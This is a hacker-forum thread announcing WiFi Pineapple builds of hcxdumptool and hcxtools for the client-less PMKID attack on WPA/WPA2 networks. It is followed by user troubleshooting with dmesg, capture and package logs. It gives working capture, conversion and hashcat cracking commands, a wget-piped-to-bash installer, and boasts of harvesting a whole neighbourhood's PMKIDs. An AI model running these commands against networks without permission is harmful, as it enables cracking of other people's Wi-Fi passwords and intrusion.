Jump to content
Hak5 Forums
Zylla

PMKID Attack on WiFi Pineapples

Recommended Posts

Posted (edited)

PMKID Attack WPA/WPA2 on WiFi Pineapples!
Pineapple NANO + TETRA

image.png.4287c51047ed1b89ed9fe0235db2d5de.png
          WARNING!

This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKID's in a minute or less, no clients needed!
ONLY use hcxdumptool on networks you have permission to, because of this:

  • hcxdumptool is able to prevent complete wlan traffic!
  • hcxdumptool is able to capture PMKID's from access points (only one single PMKID from an access point required)
  • hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required)
  • hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required)
  • hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS)
  • hcxdumptool is able to capture passwords from the wlan traffic
  • hcxdumptool is able to capture plain master-keys from the wlan traffic
  • hcxdumptool is able to capture usernames and identities from the wlan traffic


This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard.

The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required.
The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)!

The main advantages of this attack are as follow:

  • No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string
  • The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.


This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub.
As the tools gets updated often, i will have to update the packages often. So please check back for updates!

Download: hcxtools (v4.2.1-16)
Download: hcxdumptool (v4.2.1-17)

Download and install both tools automatically by using this command on your Pineapple:

wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/master/INSTALL.sh | bash -s -- -v -v



Last update: 06.10.20618
Changelog:

  • Updated hcxdumptool to follow changes from upstream (@ZerBea)

Install procedure:
Download the IPK's to your Pineapple and install them using opkg. (If you're using the Nano remember to install them to your SD-card)


How do i use this?
Chose an interface, and make sure it's not being used on anything else, let's use wlan1 in this example! (It will set the interface to monitor mode while working)

hcxdumptool -o test.pcapng -i wlan1 --enable_status 3

This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16 ?. Use --help for more info)
Filters can also be applied with  --filterlist and --filtermode (Again, read --help for details)
You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat.

hcxpcaptool -z test.16800 test.pcapng

The next step would be to transfer test.16800 to a desktop, capable of running the latest version of hashcat. (Version 4.2.0 or higher)
And then run the attack, for example like this: (This is NOT done on the Pineapple!!!)

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

 

Github repo. + source-codes:
https://github.com/adde88/hcxtools-hcxdumptool-openwrt
https://github.com/adde88/openwrt-useful-tools


The first repo. contains the IPK files, and the SDK Makefiles needed to compile the project yourelf.
The second repo contains alot of other useful tools i've compiled over time for the Pineapples if you're interested in taking a peek.

 

Donations are very helpful, and would help me contribute towards keeping all of these custom tools ported and up-to-date.
Donations

Edited by Zylla
Added install script
  • Like 3
  • Upvote 3

Share this post


Link to post
Share on other sites

As always, Awesome work dude!!!!

Share this post


Link to post
Share on other sites
1 hour ago, b0N3z said:

As always, Awesome work dude!!!!

Thanks!
This attack is really something special, compared to a simple de-auth attack. As no clients needs to be connected to the AP for the attack to work.
And our small "fits in the pocket" devices have proved their strength before!

I'll bee looking into making a module out of this as well.
Gonna try my best to get something done the next days, but i have a lot on my hands at the moment, so i hope you guys can be patient for that.
Though feel free provide feedback, and tips for improvements etc. at any time ?

  • Like 2

Share this post


Link to post
Share on other sites
Posted (edited)
20 hours ago, Zylla said:

The repo. contains the IPK files, and alot of other useful tools i've compiled over time for the Pineapples.

This is becoming a treasure trove of ipk's some old ones returning, some updated and  some new!!! MDK4!!! NGREP!!! Pyrit!!! Wireshark!!!! + more!!!  ? ❤️ ❤️ ❤️

17 hours ago, Zylla said:

As no clients needs to be connected to the AP for the attack to work.

This is a real nice addition to the pineapple arsenal!

As always thank you very much

Edited by Just_a_User
  • Like 2

Share this post


Link to post
Share on other sites

Thanks a lot. 

I receive faster a PMKID with enable_status 1 but I was not able to run hcxpcaptool ("Bus error") any suggestions?

Share this post


Link to post
Share on other sites
1 minute ago, MarcSThe1st said:

Thanks a lot. 

I receive faster a PMKID with enable_status 1 but I was not able to run hcxpcaptool ("Bus error") any suggestions?

Thanks for reporting your problem. What exact arguments are your providing to hcxpcaptool? The same as the one in the example?

Share this post


Link to post
Share on other sites
Just now, Zylla said:

What exact arguments are your providing to hcxpcaptool? The same as the one in the example?

hcxpcaptool -z test.16800 test.pcapng 
start reading from test.pcapng
Bus error

yes. already tried to figure out if it is connected to dependencies  but didn't found a solution ?

 

Share this post


Link to post
Share on other sites
Posted (edited)
13 minutes ago, MarcSThe1st said:

but I was not able to run hcxpcaptool ("Bus error") any suggestions?

Same output for me

But woah this thing is FAST!

Edited by Just_a_User

Share this post


Link to post
Share on other sites
Posted (edited)
11 minutes ago, MarcSThe1st said:

hcxpcaptool -z test.16800 test.pcapng 
start reading from test.pcapng
Bus error

yes. already tried to figure out if it is connected to dependencies  but didn't found a solution ?

 

I think i know what it is....
The only "bus" in use here is the one where the file is located.
You're using a Nano right? And the test.pcapng file is located on your SD-card?
If you answered YES to those two questions, then please copy/paste the output from dmesg after getting the error.
I'm pretty certain you're experiencing the dreaded "sd-card bug". Where the Nano are having problems with reading/writing to the SD-card.

Under normal Pineapple circumstances we don't notice this bug when it's happening, as the SD-card bus resets so fast.
But software that reads and writes alot to the SD-card bus are very sensitive about the bus suddenly going down.

I'd rather move to the /tmp folder, to avoid using the SD-card, and to avoid filling internal storage. I'm 200% certain this will fix your issue.

Edited by Zylla

Share this post


Link to post
Share on other sites
4 minutes ago, Zylla said:

You're using a Nano right? And the test.pcapng file is located on your SD-card?

I get it on tetra, with /root/ as file location.

Share this post


Link to post
Share on other sites
5 minutes ago, Just_a_User said:

Same output for me

But woah this thing is FAST!

Yeah, this attack is INSANELY efficient!
It can easily get the PMKID's from an entire neighbourhood in a minute or less. (I don't approve doing this btw! :P)

Share this post


Link to post
Share on other sites
3 minutes ago, Zylla said:

It can easily get the PMKID's from an entire neighbourhood in a minute or less. (I don't approve doing this btw! :P)

Yeah im going to have to check out the help file for filters ?

Share this post


Link to post
Share on other sites
6 minutes ago, Just_a_User said:

I get it on tetra, with /root/ as file location.

Interesting.
Can you still check dmesg just to see if there's any useful information there?

Share this post


Link to post
Share on other sites
Posted (edited)
15 minutes ago, Zylla said:

You're using a Nano right? And the test.pcapng file is located on your SD-card?
If you answered YES to those two questions, then please copy/paste the output from dmesg after getting the error.
I'm pretty certain you're experiencing the dreaded "sd-card bug". Where the Nano are having problems with reading/writing to the SD-card

YES - for both.

I will reboot the nano to give you a fresh dmesg ?  (incl. the pmkid attack!)

[    0.000000] Linux version 3.18.84 (@48ce6521e5bc) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 unknown) ) #212 Fri Aug 17 06:47:38 UTC 2018
[    0.000000] MyLoader: sysp=8a14b024, boardp=44b65156, parts=b69f8d32
[    0.000000] bootconsole [early0] enabled
[    0.000000] CPU0 revision is: 00019374 (MIPS 24Kc)
[    0.000000] SoC: Atheros AR9330 rev 1
[    0.000000] Determined physical RAM map:
[    0.000000]  memory: 04000000 @ 00000000 (usable)
[    0.000000] Initrd not found or empty - disabling initrd
[    0.000000] Zone ranges:
[    0.000000]   Normal   [mem 0x00000000-0x03ffffff]
[    0.000000] Movable zone start for each node
[    0.000000] Early memory node ranges
[    0.000000]   node   0: [mem 0x00000000-0x03ffffff]
[    0.000000] Initmem setup node 0 [mem 0x00000000-0x03ffffff]
[    0.000000] On node 0 totalpages: 16384
[    0.000000] free_area_init_node: node 0, pgdat 80365cf0, node_mem_map 81000000
[    0.000000]   Normal zone: 128 pages used for memmap
[    0.000000]   Normal zone: 0 pages reserved
[    0.000000]   Normal zone: 16384 pages, LIFO batch:3
[    0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[    0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[    0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
[    0.000000] pcpu-alloc: [0] 0
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 16256
[    0.000000] Kernel command line:  board=PINEAPPLE-NANO  console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd
[    0.000000] PID hash table entries: 256 (order: -2, 1024 bytes)
[    0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[    0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[    0.000000] Writing ErrCtl register=00000000
[    0.000000] Readback ErrCtl register=00000000
[    0.000000] Memory: 60880K/65536K available (2524K kernel code, 143K rwdata, 540K rodata, 240K init, 188K bss, 4656K reserved, 0K cma-reserved)
[    0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[    0.000000] NR_IRQS:51
[    0.000000] Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz
[    0.000000] Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104)
[    0.080000] pid_max: default: 32768 minimum: 301
[    0.080000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.090000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[    0.100000] NET: Registered protocol family 16
[    0.100000] MIPS: machine is WiFi Pineapple NANO
[    0.380000] Switched to clocksource MIPS
[    0.380000] NET: Registered protocol family 2
[    0.390000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[    0.390000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[    0.400000] TCP: Hash tables configured (established 1024 bind 1024)
[    0.400000] TCP: reno registered
[    0.410000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[    0.410000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[    0.420000] NET: Registered protocol family 1
[    0.420000] PCI: CLS 0 bytes, default 32
[    0.420000] futex hash table entries: 256 (order: -1, 3072 bytes)
[    0.440000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[    0.440000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[    0.450000] msgmni has been set to 118
[    0.460000] io scheduler noop registered
[    0.460000] io scheduler deadline registered (default)
[    0.470000] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[    0.470000] ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11, base_baud = 1562500) is a AR933X UART
[    0.480000] console [ttyATH0] enabled
[    0.490000] bootconsole [early0] disabled
[    0.500000] m25p80 spi0.0: found mx25l12805d, expected m25p80
[    0.500000] m25p80 spi0.0: mx25l12805d (16384 Kbytes)
[    0.520000] 5 tp-link partitions found on MTD device spi0.0
[    0.520000] Creating 5 MTD partitions on "spi0.0":
[    0.520000] 0x000000000000-0x000000020000 : "u-boot"
[    0.530000] 0x000000020000-0x00000013ae74 : "kernel"
[    0.540000] 0x00000013ae74-0x000000ff0000 : "rootfs"
[    0.540000] mtd: device 2 (rootfs) set to be root filesystem
[    0.540000] 1 squashfs-split partitions found on MTD device rootfs
[    0.550000] 0x000000d80000-0x000000ff0000 : "rootfs_data"
[    0.560000] 0x000000ff0000-0x000001000000 : "art"
[    0.560000] 0x000000020000-0x000000ff0000 : "firmware"
[    0.590000] libphy: ag71xx_mdio: probed
[    1.190000] ag71xx ag71xx.0: connected to PHY at ag71xx-mdio.1:04 [uid=004dd041, driver=Generic PHY]
[    1.200000] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode:MII
[    1.200000] TCP: cubic registered
[    1.200000] NET: Registered protocol family 17
[    1.210000] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[    1.220000] 8021q: 802.1Q VLAN Support v1.8
[    1.230000] VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
[    1.240000] Freeing unused kernel memory: 240K
[    2.780000] init: Console is alive
[    2.780000] init: - watchdog -
[    5.440000] usbcore: registered new interface driver usbfs
[    5.440000] usbcore: registered new interface driver hub
[    5.450000] usbcore: registered new device driver usb
[    5.500000] SCSI subsystem initialized
[    5.510000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    5.520000] ehci-platform: EHCI generic platform driver
[    5.520000] ehci-platform ehci-platform: EHCI Host Controller
[    5.530000] ehci-platform ehci-platform: new USB bus registered, assigned bus number 1
[    5.540000] ehci-platform ehci-platform: irq 3, io mem 0x1b000000
[    5.560000] ehci-platform ehci-platform: USB 2.0 started, EHCI 1.00
[    5.560000] hub 1-0:1.0: USB hub found
[    5.560000] hub 1-0:1.0: 1 port detected
[    5.570000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[    5.580000] ohci-platform: OHCI generic platform driver
[    5.580000] uhci_hcd: USB Universal Host Controller Interface driver
[    5.600000] usbcore: registered new interface driver usb-storage
[    5.850000] init: - preinit -
[    5.890000] usb 1-1: new high-speed USB device number 2 using ehci-platform
[    6.400000] hub 1-1:1.0: USB hub found
[    6.420000] hub 1-1:1.0: 4 ports detected
[    6.580000] random: procd urandom read with 11 bits of entropy available
[    6.840000] mount_root: loading kmods from internal overlay
[    6.880000] usb 1-1.1: new high-speed USB device number 3 using ehci-platform
[    7.150000] jffs2: notice: (327) jffs2_build_xattr_subsystem: complete building xattr subsystem, 1 of xdatum (1 unchecked, 0 orphan) and 1 of xref (0 dead, 0 orphan) found.
[    7.170000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[    7.180000] block: extroot: not configured
[    7.220000] jffs2: notice: (323) jffs2_build_xattr_subsystem: complete building xattr subsystem, 1 of xdatum (1 unchecked, 0 orphan) and 1 of xref (0 dead, 0 orphan) found.
[    7.250000] usb 1-1.2: new high-speed USB device number 4 using ehci-platform
[    7.350000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[    7.360000] block: extroot: not configured
[    7.360000] mount_root: switching to jffs2 overlay
[    7.390000] usb-storage 1-1.2:1.0: USB Mass Storage device detected
[    7.410000] scsi host0: usb-storage 1-1.2:1.0
[    7.440000] procd: - early -
[    7.440000] procd: - watchdog -
[    8.350000] procd: - ubus -
[    8.580000] scsi 0:0:0:0: Direct-Access     Generic  STORAGE DEVICE   0933 PQ: 0 ANSI: 6
[    8.810000] sd 0:0:0:0: [sda] 7744512 512-byte logical blocks: (3.96 GB/3.69 GiB)
[    8.810000] sd 0:0:0:0: [sda] Write Protect is off
[    8.820000] sd 0:0:0:0: [sda] Mode Sense: 21 00 00 00
[    8.830000] sd 0:0:0:0: [sda] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA
[    8.860000]  sda: sda1 sda2
[    8.880000] sd 0:0:0:0: [sda] Attached SCSI removable disk
[    9.370000] procd: - init -
[   11.360000] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts:
[   11.660000] EXT4-fs (sda1): couldn't mount as ext3 due to feature incompatibilities
[   11.670000] EXT4-fs (sda1): couldn't mount as ext2 due to feature incompatibilities
[   11.720000] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null)
[   12.910000] Adding 1004024k swap on /dev/sdcard/sd2.  Priority:-1 extents:1 across:1004024k
[   14.120000] Loading modules backported from Linux version v4.4-rc5-1913-gc8fdf68
[   14.130000] Backport generated by backports.git backports-20151218-0-g2f58d9d
[   14.290000] ath: EEPROM regdomain: 0x0
[   14.290000] ath: EEPROM indicates default country code should be used
[   14.290000] ath: doing EEPROM country->regdmn map search
[   14.290000] ath: country maps to regdmn code: 0x3a
[   14.290000] ath: Country alpha2 being used: US
[   14.290000] ath: Regpair used: 0x3a
[   14.300000] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[   14.300000] ieee80211 phy0: Atheros AR9330 Rev:1 mem=0xb8100000, irq=2
[   14.320000] usb 1-1.1: ath9k_htc: Firmware ath9k_htc/htc_9271-1.4.0.fw requested
[   14.330000] usbcore: registered new interface driver ath9k_htc
[   14.470000] RPC: Registered named UNIX socket transport module.
[   14.470000] RPC: Registered udp transport module.
[   14.480000] RPC: Registered tcp transport module.
[   14.480000] RPC: Registered tcp NFSv4.1 backchannel transport module.
[   14.510000] tun: Universal TUN/TAP device driver, 1.6
[   14.520000] tun: (C) 1999-2004 Max Krasnyansky <maxk@qualcomm.com>
[   14.550000] usbcore: registered new interface driver rt2800usb
[   14.590000] usbcore: registered new interface driver rtl8187
[   14.640000] usbcore: registered new interface driver rtl8192cu
[   14.680000] sd 0:0:0:0: Attached scsi generic sg0 type 0
[   14.700000] usbcore: registered new interface driver cdc_acm
[   14.700000] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters
[   14.720000] usbcore: registered new interface driver cdc_wdm
[   14.750000] nf_conntrack version 0.5.0 (955 buckets, 3820 max)
[   14.810000] usbcore: registered new interface driver ums-alauda
[   14.820000] usbcore: registered new interface driver ums-cypress
[   14.820000] usbcore: registered new interface driver ums-datafab
[   14.830000] usbcore: registered new interface driver ums-freecom
[   14.840000] usbcore: registered new interface driver ums-isd200
[   14.850000] usbcore: registered new interface driver ums-jumpshot
[   14.860000] usbcore: registered new interface driver ums-karma
[   14.860000] usbcore: registered new interface driver ums-sddr09
[   14.870000] usbcore: registered new interface driver ums-sddr55
[   14.890000] usbcore: registered new interface driver ums-usbat
[   14.910000] usbcore: registered new interface driver usbserial
[   14.920000] usbcore: registered new interface driver usbserial_generic
[   14.920000] usbserial: USB Serial support registered for generic
[   15.000000] xt_time: kernel timezone is -0000
[   15.000000] usbcore: registered new interface driver asix
[   15.010000] usbcore: registered new interface driver ax88179_178a
[   15.020000] usbcore: registered new interface driver cdc_ether
[   15.030000] ip_tables: (C) 2000-2006 Netfilter Core Team
[   15.060000] usbcore: registered new interface driver pl2303
[   15.060000] usbserial: USB Serial support registered for pl2303
[   15.070000] PPP generic driver version 2.4.2
[   15.080000] NET: Registered protocol family 24
[   15.080000] usbcore: registered new interface driver qmi_wwan
[   15.090000] usb 1-1.1: ath9k_htc: Transferred FW: ath9k_htc/htc_9271-1.4.0.fw, size: 51008
[   15.100000] usbcore: registered new interface driver rndis_host
[   15.110000] usbcore: registered new interface driver sierra_net
[   15.140000] usbcore: registered new interface driver option
[   15.140000] usbserial: USB Serial support registered for GSM modem (1-port)
[   15.330000] ath9k_htc 1-1.1:1.0: ath9k_htc: HTC initialized with 33 credits
[   15.580000] ath9k_htc 1-1.1:1.0: ath9k_htc: FW Version: 1.4
[   15.590000] ath9k_htc 1-1.1:1.0: FW RMW support: On
[   15.590000] ath: EEPROM regdomain: 0x0
[   15.590000] ath: EEPROM indicates default country code should be used
[   15.590000] ath: doing EEPROM country->regdmn map search
[   15.590000] ath: country maps to regdmn code: 0x3a
[   15.590000] ath: Country alpha2 being used: US
[   15.590000] ath: Regpair used: 0x3a
[   15.600000] ieee80211 phy1: Atheros AR9271 Rev:1
[   20.170000] random: nonblocking pool is initialized
[   25.820000] device eth0 entered promiscuous mode
[   29.080000] eth0: link up (100Mbps/Full duplex)
[   29.200000] br-lan: port 1(eth0) entered forwarding state
[   29.200000] br-lan: port 1(eth0) entered forwarding state
[   31.200000] br-lan: port 1(eth0) entered forwarding state
[   31.920000] device wlan0 entered promiscuous mode
[   32.150000] device wlan0-1 entered promiscuous mode
[   32.150000] br-lan: port 3(wlan0-1) entered forwarding state
[   32.160000] br-lan: port 3(wlan0-1) entered forwarding state
[   32.280000] br-lan: port 2(wlan0) entered forwarding state
[   32.280000] br-lan: port 2(wlan0) entered forwarding state
[   32.760000] br-lan: port 3(wlan0-1) entered disabled state
[   33.290000] eth0: link down
[   33.860000] br-lan: port 1(eth0) entered disabled state
[   34.280000] br-lan: port 2(wlan0) entered forwarding state
[   34.440000] eth0: link up (100Mbps/Full duplex)
[   34.490000] br-lan: port 1(eth0) entered forwarding state
[   34.490000] br-lan: port 1(eth0) entered forwarding state
[   35.740000] usb 1-1.3: new high-speed USB device number 5 using ehci-platform
[   35.790000] br-lan: port 3(wlan0-1) entered forwarding state
[   35.800000] br-lan: port 3(wlan0-1) entered forwarding state
[   36.020000] usb 1-1.3: reset high-speed USB device number 5 using ehci-platform
[   36.160000] ieee80211 phy2: rt2x00_set_rt: Info - RT chipset 5390, rev 0502 detected
[   36.490000] br-lan: port 1(eth0) entered forwarding state
[   36.860000] ieee80211 phy2: rt2x00_set_rf: Info - RF chipset 5370 detected
[   36.870000] ieee80211 phy2: Selected rate control algorithm 'minstrel_ht'
[   37.800000] br-lan: port 3(wlan0-1) entered forwarding state
[   38.010000] wlan1: authenticate with 9c:b2:b2:11:21:ad
[   38.190000] wlan1: send auth to 9c:b2:b2:11:21:ad (try 1/3)
[   38.200000] wlan1: authenticated
[   38.610000] wlan1: associate with 9c:b2:b2:11:21:ad (try 1/3)
[   38.620000] wlan1: RX AssocResp from 9c:b2:b2:11:21:ad (capab=0x411 status=0 aid=2)
[   38.630000] wlan1: associated
[   42.090000] ieee80211 phy2: rt2x00lib_request_firmware: Info - Loading firmware file 'rt2870.bin'
[   42.200000] ieee80211 phy2: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.29
[  123.660000] wlan1: deauthenticating from 9c:b2:b2:11:21:ad by local choice (Reason: 3=DEAUTH_LEAVING)

 

btw: changed directory to /tmp

 

Edited by MarcSThe1st

Share this post


Link to post
Share on other sites
Just now, MarcSThe1st said:

YES - for both.

I will reboot the nano to give you a fresh dmesg ? 

 

Hmm. I cannot see the SD-card bug happening there actually...
Anyways. Both @MarcSThe1st and @Just_a_User:
Can you try downloading/upgrading hcxtools? I've updated it. And one of the changed files are the source-files to hcxpcaptool. So maybe this squashes your bug. ?

Share this post


Link to post
Share on other sites
Posted (edited)

 

root@Pineapple:/sd/modules# opkg install hcxtools_4.2.1-2_ar71xx.ipk 
Upgrading hcxtools on root from 4.2.1-1 to 4.2.1-2...
Configuring hcxtools.
root@Pineapple:/sd/modules# opkg install hcxdumptool_4.2.1-1_ar71xx.ipk 
Installing hcxdumptool (4.2.1-1) to root...
Configuring hcxdumptool.
root@Pineapple:/sd/modules# cd /tmp

root@Pineapple:/tmp# hcxdumptool -o /tmp/test.pcapng -i wlan1mon --enable_status 1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233880bc5 (client)
MAC ACCESS POINT.........: 68e16698d73b (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65260
ANONCE...................: 82b1b6b70a33be6322e12eb4deae2309c13de84403e7852057d041ef3e9845c0

[19:07:41 - 005] 9cb2b21121ad -> fcc233880bc5 [FOUND PMKID CLIENT-LESS]
INFO: cha=7, rx=2057, rx(dropped)=323, tx=148, powned=1, err=0^C
terminated...
root@Pineapple:/tmp# hcxpcaptool -z test.16800 test.pcapng 
start reading from test.pcapng
Bus error
root@Pineapple:/tmp# 

nope, also nothing happened in the dmesg 

[   42.200000] ieee80211 phy2: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.29
[  123.660000] wlan1: deauthenticating from 9c:b2:b2:11:21:ad by local choice (Reason: 3=DEAUTH_LEAVING)

 

Edited by MarcSThe1st
mistypos

Share this post


Link to post
Share on other sites
1 minute ago, MarcSThe1st said:

 


root@Pineapple:/sd/modules# opkg install hcxtools_4.2.1-2_ar71xx.ipk 
Upgrading hcxtools on root from 4.2.1-1 to 4.2.1-2...
Configuring hcxtools.
root@Pineapple:/sd/modules# opkg install hcxdumptool_4.2.1-1_ar71xx.ipk 
Installing hcxdumptool (4.2.1-1) to root...
Configuring hcxdumptool.
root@Pineapple:/sd/modules# cd /tmp

root@Pineapple:/tmp# hcxdumptool -o /tmp/test.pcapng -i wlan1mon --enable_status 1

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233880bc5 (client)
MAC ACCESS POINT.........: 68e16698d73b (start NIC)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65260
ANONCE...................: 82b1b6b70a33be6322e12eb4deae2309c13de84403e7852057d041ef3e9845c0

[19:07:41 - 005] 9cb2b21121ad -> fcc233880bc5 [FOUND PMKID CLIENT-LESS]
INFO: cha=7, rx=2057, rx(dropped)=323, tx=148, powned=1, err=0^C
terminated...
root@Pineapple:/tmp# hcxpcaptool -z test.16800 test.pcapng 
start reading from test.pcapng
Bus error
root@Pineapple:/tmp# 

nope, also nothing happened in the dmesg 


[   42.200000] ieee80211 phy2: rt2x00lib_request_firmware: Info - Firmware detected - version: 0.29
[  123.660000] wlan1: deauthenticating from 9c:b2:b2:11:21:ad by local choice (Reason: 3=DEAUTH_LEAVING)

 

Ok. I'll get to the bottom of this asap. Working on it now.

  • Upvote 1

Share this post


Link to post
Share on other sites

Just out of curiosity.
Can either, or both of you try these commands and report back:

opkg info curl
opkg info zlib
opkg info libpthread
opkg info libpcap
opkg info libopenssl

 

Share this post


Link to post
Share on other sites

sure 

 


root@Pineapple:/tmp# opkg info curl
Package: curl
Version: 7.40.0-3.1
Depends: libc, libcurl
Status: install user installed
Section: net
Architecture: ar71xx
Maintainer: Imre Kaloz <kaloz@openwrt.org>
MD5Sum: 11a338aaec6c1b1441ecb0bfe1c0f7c4
Size: 38370
Filename: curl_7.40.0-3.1_ar71xx.ipk
Source: package/network/utils/curl
Description: A client-side URL transfer utility
Installed-Time: 1459545776

root@Pineapple:/tmp# opkg info zlib
Package: zlib
Version: 1.2.8-1
Depends: libc
Status: install user installed
Section: libs
Architecture: ar71xx
MD5Sum: ad46d1cab1a4c07e5e55dcb28b79ce61
Size: 37865
Filename: zlib_1.2.8-1_ar71xx.ipk
Source: package/libs/zlib
Description: Library implementing the deflate compression method
Installed-Time: 1534488441

root@Pineapple:/tmp# opkg info libpthread
Package: libpthread
Version: 0.9.33.2-1
Depends: libgcc
Status: install hold installed
Section: libs
Essential: yes
Architecture: ar71xx
Maintainer: Felix Fietkau <nbd@openwrt.org>
MD5Sum: bfaca8ace2404962d41bef6762f3923b
Size: 31257
Filename: libpthread_0.9.33.2-1_ar71xx.ipk
Source: package/libs/toolchain
Description: POSIX thread library
Installed-Time: 1534488441

root@Pineapple:/tmp# opkg info libpcap
Package: libpcap
Version: 1.5.3-1
Depends: libc
Status: unknown ok not-installed
Section: libs
Architecture: ar71xx
Maintainer: Felix Fietkau <nbd@openwrt.org>
MD5Sum: d3e3622bd50b7ab8d1c27b1f15a61dd5
Size: 83095
Filename: libpcap_1.5.3-1_ar71xx.ipk
Source: package/libs/libpcap
Description: This package contains a system-independent library for user-level network packet
 capture.

Package: libpcap
Version: 1.9.0-1
Depends: libc
Status: install user installed
Architecture: ar71xx
Installed-Time: 1534488441

root@Pineapple:/tmp# opkg info libopenssl
Package: libopenssl
Version: 1.0.2g-1
Depends: libc, zlib
Status: unknown ok not-installed
Section: libs
Architecture: ar71xx
MD5Sum: d0fc4828f7029e1668dbd66cbb19a7f8
Size: 685049
Filename: libopenssl_1.0.2g-1_ar71xx.ipk
Source: package/libs/openssl
Description: The OpenSSL Project is a collaborative effort to develop a robust,
 commercial-grade, full-featured, and Open Source toolkit implementing the Secure
 Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well
 as a full-strength general purpose cryptography library.
 This package contains the OpenSSL shared libraries, needed by other programs.

Package: libopenssl
Version: 1.0.2m-1
Depends: libc, zlib
Status: install user installed
Architecture: ar71xx
Installed-Time: 1534488441

 

Share this post


Link to post
Share on other sites
2 minutes ago, Zylla said:

Just out of curiosity.
Can either, or both of you try these commands and report back:


opkg info curl
opkg info zlib
opkg info libpthread
opkg info libpcap
opkg info libopenssl

 

root@Pineapple:~# opkg info curl
Package: curl
Version: 7.40.0-3.1
Depends: libc, libcurl
Status: install ok installed
Section: net
Architecture: ar71xx
Maintainer: Imre Kaloz <kaloz@openwrt.org>
MD5Sum: 11a338aaec6c1b1441ecb0bfe1c0f7c4
Size: 38370
Filename: curl_7.40.0-3.1_ar71xx.ipk
Source: package/network/utils/curl
Description: A client-side URL transfer utility
Installed-Time: 1534920880

root@Pineapple:~# opkg info zlib
Package: zlib
Version: 1.2.8-1
Depends: libc
Status: install user installed
Section: libs
Architecture: ar71xx
MD5Sum: ad46d1cab1a4c07e5e55dcb28b79ce61
Size: 37865
Filename: zlib_1.2.8-1_ar71xx.ipk
Source: package/libs/zlib
Description: Library implementing the deflate compression method
Installed-Time: 1534818086

root@Pineapple:~# opkg info libpthread
Package: libpthread
Version: 0.9.33.2-1
Depends: libgcc
Status: install hold installed
Section: libs
Essential: yes
Architecture: ar71xx
Maintainer: Felix Fietkau <nbd@openwrt.org>
MD5Sum: bfaca8ace2404962d41bef6762f3923b
Size: 31257
Filename: libpthread_0.9.33.2-1_ar71xx.ipk
Source: package/libs/toolchain
Description: POSIX thread library
Installed-Time: 1534818086

root@Pineapple:~# opkg info libpcap
Package: libpcap
Version: 1.5.3-1
Depends: libc
Status: unknown ok not-installed
Section: libs
Architecture: ar71xx
